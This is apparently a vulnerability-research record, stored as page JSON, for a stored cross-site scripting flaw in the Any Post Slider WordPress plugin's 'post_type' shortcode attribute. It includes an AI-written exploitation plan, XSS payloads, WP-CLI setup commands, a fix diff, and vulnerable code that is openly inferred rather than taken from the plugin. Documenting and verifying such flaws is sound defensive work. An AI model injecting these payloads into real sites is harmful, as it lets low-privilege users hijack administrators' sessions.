[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fyLJlT8bnpty_nMWuy_B1zIFRC1eVfFVP2oyo2xZDZo4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-1899","any-post-slider-authenticated-contributor-stored-cross-site-scripting-via-posttype-shortcode-attribute","Any Post Slider \u003C= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'post_type' Shortcode Attribute","The Any Post Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aps_slider shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on the 'post_type' attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","any-post-slider",null,"\u003C=1.0.4","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-20 15:13:13","2026-04-15 17:05:45",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F562f194f-1f32-4de4-8074-84580f653bdb?source=api-prod",[],"researched",false,3,"This research plan outlines the technical steps to exploit **CVE-2026-1899**, a Stored Cross-Site Scripting (XSS) vulnerability in the **Any Post Slider** plugin (versions \u003C= 1.0.4).\n\n---\n\n### 1. Vulnerability Summary\nThe **Any Post Slider** plugin fails to properly sanitize and escape the `post_type` attribute within its `[aps_slider]` shortcode. While `post_type` is intended to define the source of posts for the slider, an attacker with Contributor-level permissions or higher can inject malicious HTML or JavaScript into this attribute. Because the plugin renders this attribute directly into the page output without using WordPress escaping functions like `esc_attr()` or `esc_html()`, the script executes in the context of any user viewing the page.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[aps_slider]`\n*   **Vulnerable Attribute:** `post_type`\n*   **Authentication Requirement:** Contributor (can create posts and use shortcodes) or higher.\n*   **Injection Point:** The content of a WordPress post, page, or any area where shortcodes are processed.\n*   **Sink:** The HTML output rendered by the shortcode callback function (likely in an HTML attribute or wrapper div).\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode in the main plugin file or an inclusion file (e.g., `any-post-slider.php`) using `add_shortcode( 'aps_slider', 'callback_function_name' )`.\n2.  **Attribute Parsing:** Inside the callback function, the plugin uses `shortcode_atts()` to extract user-provided attributes:\n    ```php\n    $atts = shortcode_atts( array(\n        'post_type' => 'post',\n        \u002F\u002F other attributes...\n    ), $atts );\n    ```\n3.  **Vulnerable Sink:** The variable `$atts['post_type']` is concatenated into an HTML string for the frontend. For example:\n    ```php\n    $output .= '\u003Cdiv class=\"aps-slider-container\" data-post-type=\"' . $atts['post_type'] . '\">'; \n    \u002F\u002F OR\n    $output .= '\u003Cdiv class=\"aps-slider-' . $atts['post_type'] . '\">';\n    ```\n4.  **Lack of Escaping:** The `post_type` value is returned as part of the shortcode output without being wrapped in `esc_attr()` or `wp_kses()`.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability is exploited by saving a WordPress post containing a shortcode. While saving a post via the Gutenberg editor or Classic editor requires a nonce (`_wpnonce`), the vulnerability itself is in the **rendering** of the shortcode.\n\nFor the purpose of a PoC in an automated environment:\n1.  **Direct WP-CLI Injection:** Use `wp post create` as an admin or contributor to bypass the need for an HTTP-level nonce during the setup phase.\n2.  **UI-Based Nonce (If needed for HTTP-only PoC):**\n    *   The execution agent will navigate to `wp-admin\u002Fpost-new.php`.\n    *   Use `browser_eval` to extract the `_wpnonce` from the form:\n        `browser_eval(\"document.querySelector('#_wpnonce')?.value\")`.\n    *   The specific action string for post creation nonces is typically `update-post_[ID]`.\n\n### 5. Exploitation Strategy\nThe goal is to demonstrate that a Contributor can execute arbitrary JavaScript that triggers when an Admin views the post.\n\n**Step-by-Step Plan:**\n1.  **Authenticate as Contributor:** Login via the `http_request` tool or `browser_navigate`.\n2.  **Create Malicious Content:** Create a new post containing the payload.\n    *   **Payload A (Attribute Breakout):** `[aps_slider post_type='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n    *   **Payload B (Event Handler):** `[aps_slider post_type='x\" onmouseover=\"alert(1)\" style=\"width:100px;height:100px;background:red;\"']`\n3.  **Trigger Execution:** As an Admin user, navigate to the permalink of the newly created post.\n4.  **Confirm XSS:** Use `browser_eval` to check for the existence of the injected script or a triggered alert.\n\n### 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `any-post-slider` version 1.0.4 is installed and active.\n2.  **User Creation:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n3.  **Post Creation (via CLI to simplify setup):**\n    ```bash\n    wp post create --post_type=post --post_title=\"Slider Test\" --post_content='[aps_slider post_type=\"\\\">\u003Cscript>window.xss_vulnerable = true;\u003C\u002Fscript>\"]' --post_status=publish --post_author=$(wp user get attacker --field=ID)\n    ```\n\n### 7. Expected Results\n*   When the post is rendered, the HTML source will contain the unescaped payload.\n*   **Vulnerable HTML snippet (Example):**\n    `\u003Cdiv class=\"aps-slider-wrapper\" data-post-type=\"\">\u003Cscript>window.xss_vulnerable = true;\u003C\u002Fscript>\">`\n*   In the browser, executing `browser_eval(\"window.xss_vulnerable\")` should return `true`.\n\n### 8. Verification Steps\n1.  **Check Output:**\n    ```bash\n    curl -s http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID] | grep \"window.xss_vulnerable\"\n    ```\n2.  **Inspect DOM:** Use Playwright to confirm the script tag was actually parsed and executed by the browser engine.\n\n### 9. Alternative Approaches\nIf the `post_type` attribute is used within a `WP_Query` but not directly echoed, it might be reflected in a \"No posts found\" message or a slider initialization script.\n*   **Alternative Payload (Script injection into JS variable):**\n    If the plugin uses `wp_localize_script` to pass the `post_type` to a JS file:\n    `[aps_slider post_type='-post-type\");alert(1);(\"']`\n*   **Alternative Sink (CSS\u002FClass injection):**\n    If used in a class name:\n    `[aps_slider post_type='myclass\">\u003Cimg src=x onerror=alert(1)>']`\n\nIf simple attribute breakout fails, try encoding variants (e.g., HTML entities) to see if partial filtering is in place. However, the CVE description indicates \"insufficient input sanitization and output escaping,\" suggesting a direct `echo` of the attribute.","The Any Post Slider plugin for WordPress fails to sanitize and escape the 'post_type' attribute within its '[aps_slider]' shortcode. This allow authenticated users with Contributor-level permissions or higher to inject malicious JavaScript into the attribute, which executes in the context of any user viewing the page.","\u002F* Inferred from research plan based on standard WordPress shortcode implementation *\u002F\n\n\u002F\u002F Likely within any-post-slider.php or a similar shortcode handler file\n$atts = shortcode_atts( array(\n    'post_type' => 'post',\n    \u002F\u002F other attributes...\n), $atts );\n\n\u002F\u002F Vulnerable sink: attribute is concatenated into HTML without escaping\n$output .= '\u003Cdiv class=\"aps-slider-container\" data-post-type=\"' . $atts['post_type'] . '\">';","--- a\u002Fany-post-slider.php\n+++ b\u002Fany-post-slider.php\n@@ -20,1 +20,1 @@\n- $output .= '\u003Cdiv class=\"aps-slider-container\" data-post-type=\"' . $atts['post_type'] . '\">';\n+ $output .= '\u003Cdiv class=\"aps-slider-container\" data-post-type=\"' . esc_attr($atts['post_type']) . '\">';","The exploit targets the shortcode processing logic of the plugin. An attacker requires Contributor-level authentication to create or edit posts. The attacker creates a new WordPress post and includes the following shortcode payload: [aps_slider post_type='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']. When the post is saved and then viewed by any user (such as an Administrator), the plugin renders the slider. Because the 'post_type' attribute is not escaped using functions like esc_attr(), the double-quote in the payload breaks out of the HTML attribute, allowing the script tag to be parsed and executed by the victim's browser.","gemini-3-flash-preview","2026-04-18 00:57:20","2026-04-18 00:57:41",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fany-post-slider\u002Ftags"]